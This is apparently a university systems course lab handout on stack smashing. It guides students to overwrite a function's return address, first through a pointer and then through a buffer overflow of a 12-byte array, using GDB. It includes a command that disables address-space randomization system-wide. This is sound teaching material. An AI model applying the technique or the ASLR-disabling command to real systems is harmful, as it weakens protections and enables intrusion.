CSSE 132 Syllabus Schedule Quizzes Old slides Examples Resources

Lab 4: Stack Smashing

In this lab, we will leverage the knowledge of the stack and procedure calls to hack programs to make them do unexpected things.

Before starting the lab, print out a copy of the Question Sheet. You need to answer questions on this sheet as you go through the lab!

Part 1: Hacking via Pointer

1. Login to your Linux, and pull your Git repo. cd to the lab4 directory.
2. Run the following command line: sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'
3. Examine part1.c using vim.
4. To compile the code and run the code, you can use: make run
5. To compile the code and run the code in GDB, you can use: make run-gdb

Invoke the surprise function without calling it

You may notice that the function surprise is never explicitly called in the program. Our goal in this part is to manipulate the stack space and make the program invoke the function without calling it.

How to do it?

In short, we can modify the return address of the add function stored on the stack as the function address of the surprise function. As a result, when the add function finishes running and tries to go back to the main function by fetching its return address on the stack, the modified return address will actually direct it to run the surprise function.

We guide you to complete this implementation with the questions in the Question Sheet in Part1. First, let's run the code in GDB and set a series of break points in GDB to observe some key information:

• Right before calling the add function in main: Line 24
• At the beginning of the add function: Line 12
• After declaring and initializing int* xp in add: Line 16

Follow the questions/instructions in the Question Sheet to finish the rest of Part 1.

Part 2: Hacking via Buffer Overflow

Hacking by modifying the source code is not real hacking. But the Part 1 of the lab shows you how you can modify the return address of a function to do unexpected things. In this part, we will apply the same hacking technique (stack smashing) but with a more realistic approach, i.e., without changing the source code.

First, go to your lab4 folder and open part2.c via vim or emacs. Try to understand what the code is trying to do. Particularly, pay attention to the functions doIt and copyIntoBuffer.

Idea: Overall, we want to smash the stack frame of the doIt function by putting the function address of holyGrail on the stack frame of doIt where its return adress is stored. To do this, we will overflow the array char buffer[12] by filling more data beyond the defined boundary. More specifically, we will plug in the function address of holyGrail as part of the data that will be copied into the buffer. In addition, we carefully (and maliciously) manage to put that address (of holyGrail) at exactly where the return address was stored. Then after finishing the function doIt, instead of going back the place where doIt was called early, it will go and execute the function holyGrail.

How: As you may notice, the source content that the function copyIntoBuffer will copy from is actually from the command-line input, i.e., something we type in. So all we need to do is just to give it the "sneaky" command-line input.

In Part 2, to run the program, DON'T USE MAKE RUN. Instead, you will use a script we provide. To run the program with program input ABCD, you can type:

./run_part2.sh ABCD

To debug the part2 program with input ABCD and in GDB, you can type:

./run_part2.sh ABCD -g

In addition, in part2, we have to give certain function address in the input argument which are raw bytes. To type raw bytes in the argument input we can do the following:

Assuming we want to give four bytes 0x41424344 as the input and also run the code in GDB, we can type:

./run_part2.sh $'\x41\x42\x43\x44' -g

Notice that the input must start with $ and needs to be wrapped with ' '. Each byte is represent by \x plus two hexadecimal numbers. To run this command, it is recommended to type in your terminal manually rather than copy it from the webpage as the ' can be malformated when copying.

Given the skills and knowledge from the previous part, we have prepared you to practice your hacking skills. We will give less handholding and leave more room for you.

To answer the questions of Part2 in the Question Sheet you need to find proper places to set break points and figure out the answers from GDB.

Finishing the lab

1. Scan and Upload the signed Question Sheet to GradeScope.